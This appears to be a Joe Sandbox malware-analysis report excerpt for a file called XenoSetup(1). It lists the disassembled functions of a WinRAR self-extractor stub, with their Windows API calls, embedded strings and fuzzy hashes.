%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00FFE039
C:\Users\user\Desktop, xrefs: 00FFDF33
sfxname, xrefs: 00FFDFF9

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-277078469
Opcode ID: 99ab666994fc45a62e1e0c9646563c7c0cab34799f234ff916294947cbfa4c73
Instruction ID: 4938fa983b8cf0ab6d2be408eb768cae30dd8b60d39a2e23200337302d8851c4
Opcode Fuzzy Hash: 99ab666994fc45a62e1e0c9646563c7c0cab34799f234ff916294947cbfa4c73
Instruction Fuzzy Hash: 3161D171904258ABD330AFA5ED89F7B37ECBF85710F000429FAC5961A5DBBE9804D762

Function 00FFA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6EC
LoadResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA703
LockResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FFB73D,00000066), ref: 00FFA72D
GlobalLock.KERNEL32(00000000), ref: 00FFA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FFA762
GlobalUnlock.KERNEL32(00000000), ref: 00FFA7C6

Part of subcall function 00FFA626: GdipAlloc.GDIPLUS(00000010), ref: 00FFA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FFA7A7
GlobalFree.KERNEL32(00000000), ref: 00FFA7CD

Strings

PNG, xrefs: 00FFA6C6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: d99e721871c4606ce6ba0885deaf48ad294c933fdb6958067979fd2fab558b6a
Instruction ID: a2ae3689ece613199a494faff6e2c1da8514d3e7f5ea9f356b9ac469f5bb335a
Opcode Fuzzy Hash: d99e721871c4606ce6ba0885deaf48ad294c933fdb6958067979fd2fab558b6a
Instruction Fuzzy Hash: 9D3186B6A00306AFD7216F21DC88D2B7FB9FF84770B140519F94996224EB7AD804DB51

Function 00FEA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6C4

Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA728
GetLastError.KERNEL32(?,?,?,?,00FEA592,000000FF,?,?), ref: 00FEA734

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 6a0b2da790fc66981a979748e5a300ac73b28173dc520b6b855af3d2e076cc02
Instruction ID: 43949223591ac76d8f310b20d166d08bc5d566c0f445180cb9d6123940620714
Opcode Fuzzy Hash: 6a0b2da790fc66981a979748e5a300ac73b28173dc520b6b855af3d2e076cc02
Instruction Fuzzy Hash: EF418F72900559ABCB25DF64CC88AEAB7B8FF48360F144196F56DE3240D7386E90DF90

Function 01007DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002,00000000), ref: 01007E0F
TerminateProcess.KERNEL32(00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002,00000000), ref: 01007E16
ExitProcess.KERNEL32 ref: 01007E28

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4a1c1d5ed9411785f6cc463d1691593725c3057105ed66b78f1d4ba14ffe43b4
Instruction ID: 76e267e93ff8422968a99cf4f2d2373d81e05d4d94694416d0b8532fe4fb58fa
Opcode Fuzzy Hash: 4a1c1d5ed9411785f6cc463d1691593725c3057105ed66b78f1d4ba14ffe43b4
Instruction Fuzzy Hash: 20E04F31041184EBDF136F14C908A893FA9FB14351F004454F8C98A166CB3EED51CB90

Function 00FE848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE8493

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e3d19820547afde36ee2eadf9efee114573c4328057b97f1bb9c440b3ce99157
Instruction ID: abe86bd3a81d00f17bfadad51da6c6c88938aee9fc86b374404e4031f37d4898
Opcode Fuzzy Hash: e3d19820547afde36ee2eadf9efee114573c4328057b97f1bb9c440b3ce99157
Instruction Fuzzy Hash: 71823B71D042C5AEDF25EF65C881BFABB79BF05350F0840B9E84D9B152CB345A86E760

Function 00FFB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FFB7E5

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB8EF
IsDialogMessageW.USER32(?,?), ref: 00FFB902
TranslateMessage.USER32(?), ref: 00FFB910
DispatchMessageW.USER32(?), ref: 00FFB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FFB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FFB960
GetDlgItem.USER32(?,00000068), ref: 00FFB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFB99E
SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFB9B1

Part of subcall function 00FFD453: _wcslen.LIBCMT ref: 00FFD47D

SetFocus.USER32(00000000), ref: 00FFB9B8
_swprintf.LIBCMT ref: 00FFBA24

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

Part of subcall function 00FFD4D4: GetDlgItem.USER32(00000068,0103FCB8), ref: 00FFD4E8
Part of subcall function 00FFD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FFAF07,00000001,?,?,00FFB7B9,0101506C,0103FCB8,0103FCB8,00001000,00000000,00000000), ref: 00FFD510
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFD51B
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFD529
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD53F
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FFD559
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD59D
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FFD5AB
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD5BA
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD5E1
Part of subcall function 00FFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,010143F4), ref: 00FFD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FFBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FFBA90
GetTickCount.KERNEL32 ref: 00FFBAAE
_swprintf.LIBCMT ref: 00FFBAC2
GetLastError.KERNEL32(?,00000011), ref: 00FFBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FFBB43
_swprintf.LIBCMT ref: 00FFBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FFBBD0
GetCommandLineW.KERNEL32 ref: 00FFBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FFBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00FFBC6F
Sleep.KERNEL32(00000064), ref: 00FFBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FFBCE2
CloseHandle.KERNEL32(00000000), ref: 00FFBCEB
_swprintf.LIBCMT ref: 00FFBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFBD7D
SetDlgItemTextW.USER32(?,00000065,010135F4), ref: 00FFBD94
GetDlgItem.USER32(?,00000065), ref: 00FFBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00FFBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FFBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFBE68
_wcslen.LIBCMT ref: 00FFBEBE
_swprintf.LIBCMT ref: 00FFBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00FFBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FFBF4C
GetDlgItem.USER32(?,00000068), ref: 00FFBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FFBF6B
GetDlgItem.USER32(?,00000066), ref: 00FFBF85
SetWindowTextW.USER32(00000000,0102A472), ref: 00FFBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FFC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FFC0BD
EnableWindow.USER32(00000000,00000000), ref: 00FFC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FFC1D9

Part of subcall function 00FFC73F: __EH_prolog.LIBCMT ref: 00FFC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FFC1FD

Strings

STARTDLG, xrefs: 00FFB801
-el -s2 "-d%s" "-sp%s", xrefs: 00FFBB6B
@, xrefs: 00FFBB91
winrarsfxmappingfile.tmp, xrefs: 00FFBBA6
"%s"%s, xrefs: 00FFBD0D
C:\Users\user\Desktop, xrefs: 00FFBBC9
LICENSEDLG, xrefs: 00FFC0B2
<, xrefs: 00FFBB84
__tmp_rar_sfx_access_check_%u, xrefs: 00FFBAB5
%s, xrefs: 00FFBED8

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-1670982708
Opcode ID: b2748fb82817b101b6a6cc10649c1b86f8d961bf44fdb36ce097e5783a4c1304
Instruction ID: bc3ff2c86715f01ae5b010b6e10130349bd2278d3869e796e30da4d80fdaf89d
Opcode Fuzzy Hash: b2748fb82817b101b6a6cc10649c1b86f8d961bf44fdb36ce097e5783a4c1304
Instruction Fuzzy Hash: 3C421471D4425CBBEB319B60DD8AFBE376CAF01710F104059F784AA0A6CB7E5944EB61

Function 00FF0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00FF087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FF088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FF08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FF0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF0B93
ReadFile.KERNEL32(00000000,?,00007FFE,01013C7C,00000000), ref: 00FF0BB1
CloseHandle.KERNEL32(00000000), ref: 00FF0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FF0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01013C7C,?,00000000,?,00000800), ref: 00FF0C72
GetFileAttributesW.KERNELBASE(?,?,01013C7C,00000800,?,00000000,?,00000800), ref: 00FF0C9C
GetFileAttributesW.KERNEL32(?,?,01013D44,00000800), ref: 00FF0CD8

Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858

_swprintf.LIBCMT ref: 00FF0D4A
_swprintf.LIBCMT ref: 00FF0D96

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

AllocConsole.KERNEL32 ref: 00FF0D9E
GetCurrentProcessId.KERNEL32 ref: 00FF0DA8
AttachConsole.KERNEL32(00000000), ref: 00FF0DAF
_wcslen.LIBCMT ref: 00FF0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FF0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00FF0DDC
Sleep.KERNEL32(00002710), ref: 00FF0DE7
FreeConsole.KERNEL32 ref: 00FF0DED
ExitProcess.KERNEL32 ref: 00FF0DF5

Strings

SetDefaultDllDirectories, xrefs: 00FF08B9
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00FF0D84
dwmapi.dll, xrefs: 00FF0927, 00FF0D0D
DXGIDebug.dll, xrefs: 00FF08FC, 00FF0C5E
kernel32, xrefs: 00FF0873
uxtheme.dll, xrefs: 00FF0D17
SetDllDirectoryW, xrefs: 00FF0888

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: c87681d383ce34046c84d8687ddb7050a360b028b54d5999658c225a130dc374
Instruction ID: 64c681c19bd3f69b30f92e32a2ac0ece38e86b08aef4617c23ea783e3d124bf0
Opcode Fuzzy Hash: c87681d383ce34046c84d8687ddb7050a360b028b54d5999658c225a130dc374
Instruction Fuzzy Hash: E8D190B1408388ABD735DF51D849B9FBAE8BF84724F40491DF2C99A255CB3D8548CBA2

Function 00FFC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00FFC744

Part of subcall function 00FFB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FFB3FB

_wcslen.LIBCMT ref: 00FFCA0A
_wcslen.LIBCMT ref: 00FFCA13
SetWindowTextW.USER32(?,?), ref: 00FFCA71
_wcslen.LIBCMT ref: 00FFCAB3
_wcsrchr.LIBVCRUNTIME ref: 00FFCBFB
GetDlgItem.USER32(?,00000066), ref: 00FFCC36
SetWindowTextW.USER32(00000000,?), ref: 00FFCC46
SendMessageW.USER32(00000000,00000143,00000000,0102A472), ref: 00FFCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FFCC7F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00FFCB1A
ProgramFilesDir, xrefs: 00FFCB45
%s.%d.tmp, xrefs: 00FFC940
<br>, xrefs: 00FFC9D4

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 9ff01e4e01e75560e2f2deb5607b94f07f1a428fa9893ece4c256b97af35995e
Instruction ID: 21371a3cfb312cd71029d763608b555df8c62ccedff54a5c1aea355c68e0190f
Opcode Fuzzy Hash: 9ff01e4e01e75560e2f2deb5607b94f07f1a428fa9893ece4c256b97af35995e
Instruction Fuzzy Hash: B9E162B2D0026DAADB25DBA0DD85EFE77BCAF04310F4041A5F749E7094EB789E449B60

Function 00FEDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FEDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FEDAAC

Part of subcall function 00FEC29A: _wcslen.LIBCMT ref: 00FEC2A2

Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0

Part of subcall function 00FF1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FEBAE9,00000000,?,?,?,00090028), ref: 00FF1BA0

_wcslen.LIBCMT ref: 00FEDDE9
__fprintf_l.LIBCMT ref: 00FEDF1C

Strings

*messages***, xrefs: 00FEDBFA
@%s:, xrefs: 00FEDF06, 00FEDF12
$%s:, xrefs: 00FEDEFF
,, xrefs: 00FEDF57
a, xrefs: 00FEDC16
R, xrefs: 00FEDC0C
*messages***, xrefs: 00FEDBC1
, xrefs: 00FEDD6C
RTL, xrefs: 00FEDEDE

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 3e412211b8278f9fa2cdfd460f4f0961ed836ccbbcabd4241238b6ff84a42b2b
Instruction ID: 75f7c187bfdd0b85555f1c47ed2fb1bc563df2bcba7bfc979200f03393469e59
Opcode Fuzzy Hash: 3e412211b8278f9fa2cdfd460f4f0961ed836ccbbcabd4241238b6ff84a42b2b
Instruction Fuzzy Hash: A33201729002889BDF25EF69DC41BEE77A5FF14320F40011AFA459B291EBB59D84DB50

Function 00FFD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6

GetDlgItem.USER32(00000068,0103FCB8), ref: 00FFD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00FFAF07,00000001,?,?,00FFB7B9,0101506C,0103FCB8,0103FCB8,00001000,00000000,00000000), ref: 00FFD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FFD51B
SendMessageW.USER32(00000000,000000C2,00000000,010135F4), ref: 00FFD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FFD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FFD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FFD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FFD5E1
SendMessageW.USER32(00000000,000000C2,00000000,010143F4), ref: 00FFD5F0

Strings

\, xrefs: 00FFD549

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 0ceb671e11974097bcc54f1cefd8622fabebf536a21a68975c8feb2e22f97c3c
Instruction ID: b96fbd8b769bcc9c24df3108cee74c8078d541afb9897b2bee429dece23aec22
Opcode Fuzzy Hash: 0ceb671e11974097bcc54f1cefd8622fabebf536a21a68975c8feb2e22f97c3c
Instruction Fuzzy Hash: F63125B5104351AFD331DF20DC8AF6B7FACFF82314F040609F6909A184DBAA89048776

